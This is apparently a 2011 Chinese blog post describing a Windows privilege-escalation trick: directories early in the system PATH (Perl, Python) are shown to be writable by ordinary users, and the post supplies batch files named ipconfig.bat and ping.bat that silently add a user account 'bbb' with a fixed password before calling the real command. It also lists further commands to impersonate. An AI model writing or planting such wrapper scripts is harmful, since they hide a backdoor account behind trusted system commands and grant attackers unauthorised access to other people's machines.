一个存在十年之久的提权技巧,将永远存在下去?

E:\>set
COMPUTERNAME=ROOT
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\mm
LOGONSERVER=\\ROOT
NLS_LANG=AMERICAN_AMERICA.ZHS16GBK
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=E:\Perl\site\bin;E:\Perl\bin;E:\Program Files\Metasploit\Framework3\bin;E:\
Python26\Scripts;E:\Python26\;C:\Program Files\PC Connectivity Solution\;E:\Prog
ram Files\perl\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Pr
ogram Files\Common Files\Lenovo;C:\Program Files\Microsoft SQL Server\80\Tools\B
INN;E:\Program Files\Symantec\pcAnywhere\;C:\Program Files\Common Files\Thunder
Network\KanKan\Codecs;C:\Program Files\ThinkPad\ConnectUtilities;e:\Program File
s\StormII\Codec\QTSystem\;E:\oracle\instantclient_10_2;%APPDATA%\Python\Scripts;
e:\Program Files\StormII\Codec;e:\Program Files\StormII;e:\Program Files\Zend\Co
re\bin;e:\Program Files\Zend\Core\oic;e:\Program Files\Nmap;e:\Program Files\Nma
p;C:\Program Files\Common Files\Nero\Lib\;C:\Program Files\Common Files\Nero\Lib
\ 
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.py;.pyw;.BOX;.RB;.RBW
PHPRC=E:\php\
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 23 Stepping 6, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=1706
ProgramFiles=C:\Program Files
PROMPT=$P$G
QTJAVA=e:\Program Files\Java\jre1.7.0\lib\ext\QTJava.zip
RUBYOPT=-rubygems
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\xhacker\LOCALS~1\Temp
TMP=C:\DOCUME~1\xhacker\LOCALS~1\Temp
TNS_ADMIN=e:\oracle\instantclient_10_2
TPCCommon=C:\PROGRA~1\THINKV~1\PrdCtr
TVT=C:\Program Files\Lenovo
USERDOMAIN=ROOT
USERNAME=xhacker
USERPROFILE=C:\Documents and Settings\xhacker
windir=C:\WINDOWS
__COMPAT_LAYER=EnableNXShowUI

E:\>cacls E:\Perl\site\bin
E:\Perl\site\bin BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(特殊访问:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(特殊访问:)
FILE_WRITE_DATA

E:\>cacls “E:\Program Files\perl\bin”
E:\Program Files\perl\bin BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(特殊访问:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(特殊访问:)
FILE_WRITE_DATA

E:\>cacls E:\Python26\Scripts
E:\Python26\Scripts BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(特殊访问:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(特殊访问:)
FILE_WRITE_DATA

其实还有很多应用程序,如php 5.2.x,不一一列举。

用批处理也能实现的较完美:

ipconfig.bat:

@net user bbb 111111 /add>nul
@%systemroot%\system32\ipconfig.exe %1 %2 %3 %4 %5 %6

 ping.bat:

@net user bbb 111111 /add>nul
@%systemroot%\system32\ping.exe %1 %2 %3 %4 %5 %6

 其他常见的还有net、ftp、netsh、cacls、tftp、tasklist、netstat、route

posted on 2011-03-29 04:24  =_=!  阅读(358)  评论(0编辑  收藏  举报

导航